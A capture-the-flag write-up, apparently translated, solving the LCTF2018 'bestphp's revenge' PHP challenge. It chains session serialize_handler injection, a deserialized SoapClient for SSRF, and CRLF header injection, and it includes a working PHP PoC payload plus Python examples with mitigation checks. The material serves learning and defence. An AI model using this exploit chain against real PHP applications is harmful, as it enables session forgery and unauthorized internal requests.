Practice record: [LCTF] bestphp's revenge

Challenge link (for reproduction): https://buuoj.cn/challenges
Reference links: https://xz.aliyun.com/t/3341#toc-22
Looking at PHP deserialization through the LCTF WEB sign-in challenge
LCTF2018 bestphp's revenge detailed write-up

This is the LCTF web sign-in challenge?? Excuse me. I have fallen a bit behind on the challenges today. . . .

1. Knowledge points

These knowledge points link together into a chain, so I will describe them in that order:
session deserialization -> SoapClient (SSRF + CRLF) -> call_user_func triggering the SOAP request

1) Deserializing a SoapClient to trigger SSRF

2) Different session serialize_handler settings leading to session injection

3) CRLF injection

2. Problem-solving ideas

First, when PHP deserialization has no usable application class to target, PHP's native classes can be used instead (reference: exploiting PHP native classes in deserialization).
Below are the challenge source and the PoC.

//index.php
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET[f],$_POST);
session_start();
if(isset($_GET[name])){
    $_SESSION[name] = $_GET[name];
}
var_dump($_SESSION);
$a = array(reset($_SESSION),'welcome_to_the_lctf2018');
call_user_func($b,$a);
?>

//flag.php
<?php
session_start();
echo 'only localhost can get flag!';
$flag = 'LCTF{*************************}';
if($_SERVER["REMOTE_ADDR"]==="127.0.0.1"){
    $_SESSION['flag'] = $flag;
}

It is easy to think of passing f=extract to overwrite $b with whatever function we want; the problem is how to make use of the session that follows.
First, about SoapClient (reference: looking at SOAP security issues through a few CTF challenges):

SOAP (Simple Object Access Protocol) is a protocol for connecting a client to a web service, or one web service to another.
It uses HTTP as the underlying transport protocol and XML as the data format.
A SOAP message is essentially a one-way transmission from a sender to a receiver, but messages are usually combined to implement a request/response pattern.

So if we can trigger the deserialization of a SoapClient and make it send a request to flag.php, we achieve SSRF.

The problems I saw that needed solving were:

  • Where trigger deserialization
  • How to control the content of deserialized

Here we need to know that when the argument passed to call_user_func() is an array, its two members are treated as the class (or object) and the method name. For example, in this challenge you can first use extract() to overwrite $b with call_user_func; reset($_SESSION) is $_SESSION['name'], so we pass name=SoapClient, and the final call_user_func($b, $a) becomes call_user_func(array('SoapClient','welcome_to_the_lctf2018')), i.e. a call to SoapClient->welcome_to_the_lctf2018. Since SoapClient has no method called welcome_to_the_lctf2018, the magic method __get() is invoked, and that is what sends the request.

So how do we control the contents of the SoapClient? Here is the PoC from the big guys:

<?php
// where the SSRF request is sent: flag.php on the local host
$target = "http://127.0.0.1/flag.php";
// 'location' is the request target; 'user_agent' carries the CRLF-injected Cookie header
$attack = new SoapClient(null,array('location' => $target,
    'user_agent' => "N0rth3ty\r\nCookie: PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4\r\n",
    'uri' => "123"));
// serialize the object and URL-encode it so it can be placed into the session
$payload = urlencode(serialize($attack));
echo $payload;

This also involves CRLF (reference: [reprint] CRLF injection vulnerability analysis and exploitation examples). My understanding is that when an HTTP request meets two \r\n (in other words %0d%0a), the first half is parsed as the headers and the remaining part as the body, so if the headers are controllable, you can inject CRLF to modify the HTTP request packet. If my understanding is wrong, please correct me, big brothers.

The CRLF in this PoC is used to forge a request to flag.php and have the result saved into the session whose cookie is PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4.
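To make the CRLF point concrete, here is an added Python example (my own, not code from the original post or from PHP's SoapClient) that shows what the receiving server sees when one header value contains \r\n, and the check a client should apply before emitting a header. The user_agent string from the PoC above is reused as the constructed input; the function names are assumptions of this example.

```python
# Added example (not from the post): how a CR/LF inside one header value is seen
# by the receiver, and the check a client should apply before sending it.
CR_LF = ('\r', '\n')

# Constructed input, taken from the post's PoC: a User-Agent value carrying a second header line.
INJECTED_UA = "N0rth3ty\r\nCookie: PHPSESSID=tcjr6nadpk3md7jbgioa6elfk4\r\n"


def build_request(method: str, path: str, headers: dict) -> bytes:
    """Join headers naively, as a client with no CR/LF filtering would."""
    lines = [f'{method} {path} HTTP/1.1'] + [f'{k}: {v}' for k, v in headers.items()]
    return ('\r\n'.join(lines) + '\r\n\r\n').encode()


def parse_request(raw: bytes):
    """Server view: headers end at the first blank line; whatever follows is the body."""
    head, _, body = raw.partition(b'\r\n\r\n')
    request_line, *header_lines = head.decode().split('\r\n')
    headers = []
    for line in header_lines:
        name, _, value = line.partition(':')
        headers.append((name.strip(), value.strip()))
    return request_line, headers, body


def is_safe_header_value(value: str) -> bool:
    """Mitigation: a header value must not contain CR or LF.
    Python's http.client rejects such values with ValueError for the same reason."""
    return not any(c in value for c in CR_LF)


def build_request_checked(method: str, path: str, headers: dict) -> bytes:
    """Same as build_request, but refuses header values that would split the request."""
    for k, v in headers.items():
        if not is_safe_header_value(str(v)):
            raise ValueError(f'CR/LF in header {k!r} rejected')
    return build_request(method, path, headers)


def demo():
    """Return the header names the server parses and the body it receives when the
    injected User-Agent goes through an unchecked client."""
    headers = {'Host': '127.0.0.1', 'User-Agent': INJECTED_UA, 'Content-Type': 'text/xml'}
    _, seen, body = parse_request(build_request('POST', '/flag.php', headers))
    return [n for n, _ in seen], body


if __name__ == '__main__':
    names, body = demo()
    print(names)   # the injected Cookie shows up as its own header
    print(body)    # the client's own Content-Type header has been pushed into the body
```

The second \r\n at the end of the injected value, followed by the \r\n the client itself emits, forms the blank line that ends the header block, which is why the headers the client meant to send after User-Agent end up in the body; a client that applies is_safe_header_value never produces such a request.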

Finally, how do we make the result of PHP's deserialization controllable? This involves PHP's session deserialization mechanism.

PHP does not keep session content in memory; it stores it on disk. The storage method is determined by the configuration item session.save_handler, and the default is file storage.
The files are named sess_<sessionid>, and the file content is the serialized session value.
The presence of three configuration items in php.ini:

session.save_path=""   -- sets the session storage path
session.save_handler="" -- sets a user-defined storage function; use this if you want a storage mechanism other than PHP's built-in one (a database, etc.)
session.serialize_handler   string -- defines the name of the handler used to serialize/deserialize. The default is php (changed to php_serialize after 5.5.4)

PHP's built-in handlers are used to serialize and deserialize $_SESSION data when it is stored; the less commonly used ones correspond to three different storage formats:

Handler                       Storage format
php                           key name + vertical bar "|" + value processed by serialize()/unserialize()
php_binary                    ASCII character for the key-name length + key name + value processed by serialize()/unserialize()
php_serialize (php>=5.5.4)    the whole array processed by serialize()/unserialize()

The handler used for serializing and deserializing can be chosen through the session.serialize_handler configuration option.

If PHP uses one handler when storing $_SESSION data and a different one when deserializing it, the data cannot be deserialized correctly, and with specially crafted input, arbitrary data can even be forged.

When the data is stored with php_serialize and read back with php: if the injected data is a=|O:4:"test":0:{}, the session content becomes a:1:{s:1:"a";s:16:"|O:4:"test":0:{}";}. Parsed by the php handler, a:1:{s:1:"a";s:16:" is taken as the key, and the test object after the | is injected.

The call_user_func at the very start has not been used yet; we can construct session_start(['serialize_handler'=>'php_serialize']) to achieve the injection.
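To make the handler mismatch concrete, here is an added Python example (my own, not PHP's implementation and not code from the original post) that re-implements, in simplified form, the php and php_serialize session formats described above and shows how a value written by php_serialize is re-split by the php handler at the "|". The unserializer handles only the s/i/N/a/O types, strings are treated as ASCII so len() matches serialize()'s byte count, and the helper names (php_view_of_php_serialize_file, smuggled_classes) are this example's own.

```python
from dataclasses import dataclass, field

# Added example: minimal models of PHP's two session serialize_handler formats.
# Not PHP's code; strings are ASCII so len() equals the byte length serialize() writes.


@dataclass
class PhpObject:
    """A deserialized PHP object: class name plus its properties."""
    cls: str
    props: dict = field(default_factory=dict)


def _serialize(v) -> str:
    """Subset of PHP serialize(): string, int, null and array of those."""
    if isinstance(v, str):
        return f's:{len(v)}:"{v}";'
    if isinstance(v, int):
        return f'i:{v};'
    if v is None:
        return 'N;'
    if isinstance(v, dict):
        body = ''.join(_serialize(k) + _serialize(x) for k, x in v.items())
        return f'a:{len(v)}:{{{body}}}'
    raise TypeError(f'unsupported type {type(v).__name__}')


def _unserialize_at(s: str, i: int):
    """Parse one serialized value at s[i]; return (value, index just after it)."""
    t = s[i]
    if t == 'N':
        return None, i + 2                                   # 'N;'
    if t == 'i':
        end = s.index(';', i)
        return int(s[i + 2:end]), end + 1
    if t == 's':                                             # s:<len>:"<bytes>";
        colon = s.index(':', i + 2)
        length = int(s[i + 2:colon])
        start = colon + 2                                    # skip ':"'
        return s[start:start + length], start + length + 2   # skip '";'
    if t in ('a', 'O'):                                      # a:<n>:{...}  /  O:<len>:"<class>":<n>:{...}
        colon = s.index(':', i + 2)
        n = int(s[i + 2:colon])
        j = colon + 2
        name = None
        if t == 'O':
            name = s[j:j + n]
            j += n + 2                                       # skip '":'
            colon = s.index(':', j)
            n = int(s[j:colon])
            j = colon + 2
        items = {}
        for _ in range(n):
            k, j = _unserialize_at(s, j)
            v, j = _unserialize_at(s, j)
            items[k] = v
        return (PhpObject(name, items) if t == 'O' else items), j + 1   # skip '}'
    raise ValueError(f'unsupported type tag {t!r} at offset {i}')


def encode_php_serialize_handler(data: dict) -> str:
    """serialize_handler=php_serialize: serialize() of the whole $_SESSION array."""
    return _serialize(data)


def encode_php_handler(data: dict) -> str:
    """serialize_handler=php: key|serialize(value) records written back to back."""
    return ''.join(f'{k}|{_serialize(v)}' for k, v in data.items())


def decode_php_serialize_handler(blob: str) -> dict:
    value, _ = _unserialize_at(blob, 0)
    return value


def decode_php_handler(blob: str) -> dict:
    """php handler: everything up to the next '|' is the key, then one serialized value.
    As in PHP, reading stops once no further '|' is found."""
    out, i = {}, 0
    while i < len(blob):
        bar = blob.find('|', i)
        if bar == -1:
            break
        key = blob[i:bar]
        value, i = _unserialize_at(blob, bar + 1)
        out[key] = value
    return out


def php_view_of_php_serialize_file(data: dict) -> dict:
    """What the php handler makes of a session file written by the php_serialize handler."""
    return decode_php_handler(encode_php_serialize_handler(data))


def smuggled_classes(data: dict) -> list:
    """Defender check: class names that would be instantiated if this session data,
    written under php_serialize, were read back under the php handler."""
    view = php_view_of_php_serialize_file(data)
    return [v.cls for v in view.values() if isinstance(v, PhpObject)]


if __name__ == '__main__':
    injected = {'a': '|O:4:"test":0:{}'}                     # the post's example value
    print(encode_php_serialize_handler(injected))
    print(php_view_of_php_serialize_file(injected))          # key is the php_serialize prefix
    print(smuggled_classes(injected), smuggled_classes({'name': 'alice'}))
```

With a consistent handler on both sides the round trip is clean; the object only appears when the writer used php_serialize and the reader used php, which is why the fix is to keep session.serialize_handler identical for every script that touches the same session store (and not to let request-time session_start() options override it).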

3. Problem-solving steps

First, inject the session using the PoC obtained above.

Then trigger the deserialization so that the SoapClient sends its request.

Finally, access the page with the cookie of the session that now carries the flag to obtain it.


Source: www.cnblogs.com/20175211lyz/p/11515519.html